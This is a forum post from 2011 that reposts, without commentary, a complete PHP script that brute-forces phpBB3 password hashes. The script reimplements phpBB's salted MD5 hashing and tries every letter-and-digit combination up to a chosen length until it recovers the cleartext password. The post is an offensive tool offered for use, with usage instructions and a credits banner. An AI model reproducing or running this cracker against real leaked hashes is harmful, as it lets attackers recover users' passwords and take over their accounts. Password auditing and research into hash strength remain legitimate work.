|   | bleu moon | 07-08-2011 06:49 PM |  
 phpbb3 hash bruteforce
  كود: 
 /////////////////////////////////////////////////////////////////// R00TSECURITY.ORG - YOUR SECURITY COMMUNITY
 // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 // [2008-07-15] PhpBB3 Hash Bruteforce
 // http://r00tsecurity.org/db/code/134
 // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 // GENERATED ON: 2011-07-08 | 19:18:07
 /////////////////////////////////////////////////////////////////
 
 
 CODE INFO
 USAGE:
 php script.php 'hash' chars
 
 SOURCE CODE
 #!/usr/bin/php
 <?php
 set_time_limit(0);
 
 echo "///////////////////////////////////////////////\r\n";
 echo "//         PHPBB3 Bruteforce             //\r\n";
 echo "//  Original bruteforce script by Tux      //\r\n";
 echo "//     Moded for Phpbb3 by Jeforce     //\r\n";
 echo "//     http://www.jeforce.net            //\r\n";
 echo "////////////////////////////////////////////\r\n";
 
 if ($argc<2 || $argv[1]=='--help') {
 echo<<<END
 USAGE: {$argv[0]} 'hash' chars
 - hash        : The hash to crack
 - chars        : Max length string to attempt to crack
 
 HELP: {$argv[0]} --help
 
 
 END;
 exit;
 }
 //Fonction PHPBB3
 
 function _hash_crypt_private($password, $setting, &$itoa64)
 {
 $output = '*';
 // Check for correct hash
 if (substr($setting, 0, 3) != '$H$')
 {return $output;}
 
 $count_log2 = strpos($itoa64, $setting[3]);
 if ($count_log2 < 7 || $count_log2 > 30)
 {return $output;}
 $count = 1 << $count_log2;
 $salt = substr($setting, 4, 8);
 if (strlen($salt) != 8)
 {return $output;}
 
 $hash = pack('H*', md5($salt . $password));
 do
 {
 $hash = pack('H*', md5($hash . $password));
 }
 while (--$count);
 $output = substr($setting, 0, 12);
 $output .= _hash_encode64($hash, 16, $itoa64);
 return $output;
 }
 function _hash_gensalt_private($input, &$itoa64, $iteration_count_log2 = 6)
 {
 if ($iteration_count_log2 < 4 || $iteration_count_log2 > 31)
 {$iteration_count_log2 = 8;}
 $output = '$H$';
 $output .= $itoa64[min($iteration_count_log2 + ((PHP_VERSION >= 5) ? 5 : 3), 30)];
 $output .= _hash_encode64($input, 6, $itoa64);
 return $output;
 }
 
 /**
 * Encode hash
 */
 function _hash_encode64($input, $count, &$itoa64)
 {
 $output = '';
 $i = 0;
 do
 {
 $value = ord($input[$i++]);
 $output .= $itoa64[$value & 0x3f];
 if ($i < $count)
 {$value |= ord($input[$i]) << 8;}
 $output .= $itoa64[($value >> 6) & 0x3f];
 if ($i++ >= $count)
 {break;}
 if ($i < $count)
 {$value |= ord($input[$i]) << 16;}
 $output .= $itoa64[($value >> 12) & 0x3f];
 if ($i++ >= $count)
 {break;}
 $output .= $itoa64[($value >> 18) & 0x3f];
 }
 while ($i < $count);
 return $output;
 }
 function phpbb_check_hash($password, $hash)
 {
 $itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
 if (strlen($hash) == 34)
 {
 return (_hash_crypt_private($password, $hash, $itoa64) === $hash) ? true : false;
 }
 return (md5($password) === $hash) ? true : false;
 }
 
 //if(isset($argv[4])) $charset=$argv[4];
 //else $charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
 
 $charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
 $charset_beginning = $charset{0};
 $charset_end = $charset{strlen($charset)-1};
 
 //$HASH = '$H$99i1.eNyzhGdi5/lAnKnSjU8iIABC80';
 // $SIZE = (int) $_GET['chars'];
 $HASH = $argv[1];
 $SIZE = (int) $argv[2];
 
 $start = time()-1;
 $curtotal=0;
 $total=0;
 for($i=$SIZE; $i>0; $i--) $total+=pow(strlen($charset), $i);
 $split=ceil(($total/strlen($charset))/5);
 
 
 echo " *** MAX SIZE: $SIZE, cracking HASH: $HASH\r\n";
 echo " *** TOTAL KEYS: $total\r\n";
 echo " *** CHARSET: $charset\r\n";
 
 for($i=1; $i<=$SIZE; $i++) {
 $keyspace = pow(strlen($charset), $i);
 echo "\r\nAttempting to crack with $i characters.\r\n";
 echo " *** Total combinations: $keyspace\r\n";
 
 $key = '';
 for ($y=0; $y<$i; $y++) $key .= $charset_beginning;
 
 for ($x=0; $x<$keyspace+1; $x++) {
 $curtotal++;
 
 if (phpbb_check_hash($key, $HASH)) {
 $time=(time()-$start);
 echo<<<END
 
 Successfully key cracked after $time seconds. The cracker searched a total
 of $curtotal keys out of a possible $total in $time seconds.
 
 Found the clear text of '$HASH' is '$key'.\n
 END;
 exit;
 }
 
 if($x%$split == 0) {
 $rate=ceil($curtotal/(time()-$start));
 echo " ... $curtotal/$total ($key) [$rate Keys/second]\r\n";
 }
 
 for ($y=0; $y<$i; $y++) {
 if ($key[$y] != $charset_end) {
 $key[$y] = $charset{strpos($charset, $key[$y])+1};
 
 if ($y > 0)  for ($z = 0; $z < $y; $z++) $key[$z] = $charset_beginning;
 break;
 }
 }
 }
 }
 $time=time()-$start;
 echo<<<END
 *** SORRY NO MATCHS FOUND
 Time running : $time. Keys searched : $total.\n
 END;
 ?>
 
 // http://r00tsecurity.org/db/code/134
 |